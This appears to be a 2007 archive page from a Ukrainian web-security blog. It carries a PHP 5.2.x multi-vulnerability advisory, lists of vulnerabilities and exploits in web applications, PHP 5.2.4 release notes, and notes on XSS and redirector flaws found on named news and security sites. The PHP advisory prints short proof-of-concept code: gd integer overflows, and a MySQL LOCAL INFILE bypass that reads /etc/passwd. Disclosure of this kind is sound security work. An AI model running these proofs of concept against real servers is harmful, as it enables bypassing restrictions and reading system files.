Архів за Вересень, 2007

Численні уразливості в PHP

19:47 07.09.2007

Виявленні численні уразливості в PHP. Уразливі версії: PHP 5.2.x.

Знайдені уразливості дозволяють віддаленому користувачу обійти деякі обмеження безпеки.

1. Уразливість існує через невідому помилку у функції “money_format()” при обробці токенів “%i” та “%n”.

2. Уразливість існує через невідому помилку у функції “zend_alter_ini_entry()”. Зловмисник може викликати memory_limit переривання.

3. Цілочисленне переповнення виявлене у функціях “gdImageCreate()” і “gdImageCreateTrueColor()” у файлі ext/gd/libgd/gd.c. Зловмисник може за допомогою занадто великих цілочисленних значень, переданих як параметр PHP функції “imagecreatetruecolor()” викликати переповнення динамічної пам’яті. Віддалений користувач може виконати довільний код на цільовій системі чи обійти обмеження безпеки (наприклад, директиву “disable_functions”). Для успішної експлуатації уразливості PHP повинен бути налаштований для використання бібліотеки gd. Приклад:

<?php
imagecreatetruecolor(1234,1073741824);
?>

4. Два цілочисленних переповнення виявлені у функції “gdImageCopyResized()” у файлі ext/gd/libgd/gd.c. Зловмисник може за допомогою занадто великих цілочисленних значень, переданих як параметр PHP функціям “imagecopyresized()” і “imagecopyresampled()” викликати переповнення динамічної пам’яті. Віддалений користувач може виконати довільний код на цільовій системі чи обійти обмеження безпеки (наприклад, директиву “disable_functions”). Для успішної експлуатації уразливості PHP повинен бути налаштований для використання бібліотеки gd. Приклад:

<?php
imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),
imagecreatetruecolor(120, 120),
0, 0, 0, 0, 0x7fffffff, 120, 120, 120);
?>

5. Уразливість існує через помилку при обробці SQL запитів, що містять “LOCAL INFILE” усередині MySQL і MySQLi розширень. Зловмисник може обійти обмеження директив “open_basedir” і “safe_mode”. Приклад:

MySQL:

<?php
file_get_contents('/etc/passwd');
$l = mysql_connect("localhost", "root");
mysql_query("CREATE DATABASE a");
mysql_query("CREATE TABLE a.a (a varchar(1024))");
mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'");
mysql_close($l);
mysql_connect("localhost", "aaaa");
mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$result = mysql_query("SELECT a FROM a.a");
while(list($row) = mysql_fetch_row($result))
print $row . chr(10);
?>

MySQLi:

<?php
function r($fp, &$buf, $len, &$err) {
print fread($fp, $len);
}
$m = new mysqli('localhost', 'aaaa', '', 'a');
$m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
$m->set_local_infile_handler("r");
$m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a");
$m->close();
?>

6. Уразливість існує через помилку при обробці функцій “session_save_path()” та “ini_set()”, викликуваних з “.htaccess” файлу. Зловмисник може обійти обмеження директив “open_basedir” і “safe_mode”.

7. Уразливість існує через невідому помилку у функції “glob()”. Зловмисник може обійти обмеження директиви “open_basedir”.

8. Уразливість існує через невідому помилку при обробці сесій. Зловмисник може замінити сесійний файл символічною лінкою і обійти обмеження директиви “open_basedir”.

Рекомендується встановити останню версію 5.2.4 із сайта виробника.

  • Множественные уязвимости в PHP (деталі)

Добірка уразливостей

16:33 07.09.2007

В даній добірці уразливості в веб додатках:

  • SQL injection vulnerability in Jelsoft vBulletin (деталі)
  • Remote File Inclusion in Craig Knudsen WebCalendar (деталі)
  • Drupal Project issue tracking Module 4.7 (деталі)
  • Vulnerability in the Nodefamily module for Drupal 5.x (деталі)
  • Multiple buffer overflows in Ezstream (деталі)
  • Vulnerability in ISPUtil (деталі)
  • Vulnerability in Trac before 0.10.3.1 (деталі)
  • SQL injection vulnerability in Techno Dreams Announcement (деталі)
  • Vulnerability in NmnLogger (деталі)
  • Cross-site scripting (XSS) vulnerability in foresite CMS (деталі)
  • PHP-інклюдинг в VideoDB (деталі)
  • PHP-інклюдинг в AllMyGuests (деталі)
  • SQL injection vulnerability in Simplog 0.9.3.1 (деталі)
  • PHP remote file inclusion vulnerability in PHPRecipeBook 2.36 (деталі)
  • SQL-ін’єкція та інклюдинг локальних файлів в OpenBiblio (деталі)

Invision Power Board 2.3.1

22:38 06.09.2007

Деякий час тому вийшов Invision Power Board v2.3.1, тому всім хто користується движком IPB, раджу звернути увагу на нову версію.

  • Русская версия Invision Power Board 2.3.1 (деталі)

Компанія IBResource офіційно повідомляє про випуск російської версії форуму Invision Power Board v2.3.1. Ця версія містить у собі структурні зміни у вихідному коді файлів, що дозволили підвищити швидкодію системи на великих форумах.

Виправлено близько 20 помилок, а також для зменшення часу завантаження сторінки перероблений процес завантаження профілю-анкети користувача. Змінено стиль головної сторінки адмінцентра. Тепер доступ до більшості функцій і налаштувань можна одержати з першої сторінки. З’явилася інтерактивна допомога для адміністратора. Додана можливість перепризначення стилів, завдяки якій їх можна використовувати незалежно від URL що переглядається.

Уразливості на www.interfax.ru

20:14 06.09.2007

16.04.2007

У грудні, 21.12.2006, я знайшов Cross-Site Scripting уразливості на відомому проекті http://www.interfax.ru (інтернет ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

06.09.2007

XSS:

Дані уразливості досі не виправлені.

Добірка експлоітів

17:45 06.09.2007

В даній добірці експлоіти в веб додатках:

  • Xoops module Articles <= 1.03 (index.php cat_id) SQL Injection Exploit (деталі)
  • CodeBB 1.0 beta 2 (phpbb_root_path) Remote File Inclusion Vulnerability (деталі)
  • MangoBery CMS 0.5.5 (quotes.php) Remote File Inclusion Vulnerability (деталі)
  • Xoops Module Friendfinder <= 3.3 (view.php id) SQL Injection Exploit (деталі)
  • iPhotoAlbum 1.1 (header.php) Remote File Include Vulnerability (деталі)
  • JC URLshrink 1.3.1 Remote Code Execution Vulnerability (деталі)
  • Advanced Login <= 0.7 (root) Remote File Inclusion Vulnerability (деталі)
  • Kaqoo Auction (install_root) Multiple Remote File Include Vulnerabilities (деталі)
  • Picture-Engine <= 1.2.0 (wall.php cat) Remote SQL Injection Exploit (деталі)
  • LightRO CMS 1.0 (index.php projectid) Remote SQL Injection Exploit (деталі)

Редиректори на секюріті сайтах №2

23:39 05.09.2007

Продовжую розповідати вам про редиректори на секюріті сайтах. Редиректори - це окремий різновид уразливостей в веб додатках (котрий можна віднести до класу Abuse of Functionality). Дані уразливості можуть використовуватися зловмисниками для переадресації на небезпечні та фішинг сайти.

До наведених в попередньому записі, приведу ще декілька прикладів редиректорів на сайтах про інформаційну безпеку.

Редиректори на секюріті сайтах:

Security.Compulenta:

Сompulenta використовує Bitrix, тому дані уразливості наявні в цій CMS. Минулого разу я вже згадував, що Bitrix має уразливості даного типу.

Secnews:

Secblog:

Секблог використовує DataLife Engine, тому дана уразливість наявна в системі DataLife Engine. І всі сайти на даній CMS можуть мати дану уразливість.

В плеєрі QuickTime усунуті дві небезпечні діри

21:46 05.09.2007

Компанія Apple усунула дві уразливості в плеєрі QuickTime.

Як деякий час тому повідомлялося в бюлетені безпеки, обидві проблеми пов’язані з особливостями реалізації підтримки Java у додатку. Одна з дір теоретично дозволяє зловмиснику одержати несанкціонований доступ до віддаленого комп’ютера і виконати на ньому довільний програмний код. Для реалізації нападу досить заманити потенційну жертву на сформований спеціальним чином веб-сайт в Інтернеті.

Друга дірка також може бути задіяна через шкідливу веб-сторінку. Ця діра забезпечує можливість несанкціонованого читання пам’яті браузера і не може використовуватися для захоплення контролю над віддаленим комп’ютером. Усім користувачам плеера QuickTime на комп’ютерах під керуванням операційних систем Microsoft Windows і Apple Mac OS Х рекомендується завантажити обновлену версію додатка, у якій уразливості усунуті.

По матеріалам http://www.secblog.info.

Добірка уразливостей

16:14 05.09.2007

В даній добірці уразливості в веб додатках:

  • DoS against Telligent Community Server (деталі)
  • Remote File Include In Script Premod SubDog 2 (деталі)
  • PHP-Nuke <= 8.0 Cookie Manipulation (lang) (деталі)
  • Security bypass vulnerability in LedgerSMB and SQL-Ledger (fixes released today) (деталі)
  • wwwpaintboar(newsfile) Remote File Inclusion Vulnerability (деталі)
  • HC NEWSSYSTEM 1.0-4 (index.php “ID”) Blind SQL Injection (деталі)
  • Cross-site scripting (XSS) vulnerability in Snitz Forums 2000 3.4.06 (деталі)
  • Sun Java System/iPlanet Messaging Server Webmail - email JavaScript can be executed in user’s browser (деталі)
  • PHP-інклюдинг в DeluxeBB (деталі)
  • Міжсайтовий скриптінг в digiSHOP (деталі)
  • Discuz! 5.0.0 GBK SQL Injection / Admin Credentials Disclosure Exploit (деталі)
  • Vulnerability in Novell iManager 2.5 and 2.0.2 (деталі)
  • SQL injection vulnerability in Techno Dreams Guest Book (деталі)
  • Міжсайтовий скриптінг в Mercury SiteScope (деталі)
  • PHP-інклюдинг в Forum82 (деталі)

Вийшов PHP 5.2.4

21:06 04.09.2007

На днях, 30.08.2007, вийшов PHP 5.2.4, у якому виправлено більш 120 помилок, усунуто 12 проблем пов’язаних з безпекою (точніше 14, з урахуванням двох виправлень попередніх виправлень):

  • Помилка виконання операції з плаваючою крапкою у функції wordwrap();
  • Цілочислене переповнення в GD розширенні;
  • Помилка обчислення розміру у функції chunk_split();
  • Цілочислене переповнення у функціях str[c]spn();
  • Помилка обробки операторів %i та %n у функції money_format();
  • Проблеми з встановленням обмежень memory_limit у zend_alter_ini_entry();
  • Проблеми з роботою опцій INFILE LOCAL у випадку використання розширення MySQL і включених обмежень open_basedir чи safe_mode.
  • Помилка перевірки параметрів у session.save_path і error_log на предмет подпадания під ліміти open_basedir і safe_mode;
  • Проблеми читання даних у функції glob() на win32 платформі;
  • Переповнення буфера в php_openssl_make_REQ;
  • Обхід обмежень open_basedir усередині функції glob();
  • Обхід обмежень open_basedir у розширенні організуючому роботу користувацьких сесій, у випадку коли файл сесії є сімлінком.
  • А також покращений фікс для MOPB-03-2007.
  • Та виправлений фікс для CVE-2007-2872.

Крім того, інтегрована бібліотека PCRE обновлена до версії 7.2, у модуль pdo_pgsql додані засоби для спостереження за станом постійного (persistent) з’єднання до СУБД.

Всім користувачам рекомендується встановити останню версію PHP.

По матеріалам http://www.php.net та http://www.opennet.ru.

Уразливість на tabloid.com.ua

18:52 04.09.2007

12.04.2007

У грудні, 16.12.2006, я знайшов Cross-Site Scripting уразливість на популярному проекті http://tabloid.com.ua (інтернет ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Дана уразливість - це ще один з прикладів уразливостей в пошуці Яndex.Server, про які я писав.

Детальна інформація про уразливість з’явиться пізніше.

01.09.2007

XSS:

Дану уразливість вже виправили. Але зробили це не повністю і при невеличкій модифікації вона знову працює.

XSS:

Тому дана уразливість поки що не виправлена.